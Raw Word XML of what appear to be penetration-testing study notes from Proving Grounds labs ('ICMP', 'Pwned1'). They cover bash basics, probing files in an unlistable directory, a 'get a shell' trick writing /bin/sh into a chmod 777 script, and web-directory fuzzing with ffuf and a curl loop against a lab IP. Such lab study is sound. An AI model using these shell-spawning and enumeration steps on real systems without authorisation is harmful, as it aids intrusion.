    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searches through your command history </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again to toggle through next most recent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4339675" cy="3414713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="440" name="image433.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image433.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1126"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4339675" cy="34147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3F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the ICMP PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows that even if you don't have permissions to list the files inside of a directory (devel), you can still name permissions of a specific file within that directory by specifying the file in the command (devel/crypt.php). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, they used the "cat" command to read it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also use this to check whether a file exists within a protected directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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3FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1y5x8t4s5p8o" w:id="463"/>
      <w:bookmarkEnd w:id="463"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run commands using bash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -c "whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003400">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003401">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run files using bash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003402">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash example.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003403">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003404">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the Bash Signature or "Shebang" at the top of Bash Scripts to tell system that you want Bash Interpreter to run this. It is more important than the file extension. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003405">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And alternatively, if you wanted python, you would do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003407">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003408">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003409">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever are able to run Bash or a bash file, just put this to get a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if you have a file do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6mk60137xcbk" w:id="464"/>
      <w:bookmarkEnd w:id="464"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing web directories with bash scripting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003410">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003411">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1127">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we got a .dic (dictionary) file that contained what looked like a list of directory names. If we get a dictionary file like that, it's always a good idea to try fuzzing web directories with it. In this writeup, they wrote a bash script, but they could have very much easily used ffuf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003412">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://192.168.213.95/FUZZ -w dictionary.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003413">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003414">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="355600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="204" name="image195.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image195.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1128"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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3415">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003416">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BASE_URL="http://192.168.213.95/"; while IFS= read -r ENTRY; do curl "${BASE_URL}${ENTRY}"; echo; done &lt; dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003417">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003418">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BASE_URL="http://192.168.213.95/"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003419">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets a Bash variable called BASE_URL to the string http://192.168.213.95/. You can later use it with ${BASE_URL}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> while IFS= read -r ENTRY; do ... done &lt; dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a while loop that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IFS= </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ disables word splitting (makes sure lines with spaces are read fully).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read -r ENTRY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
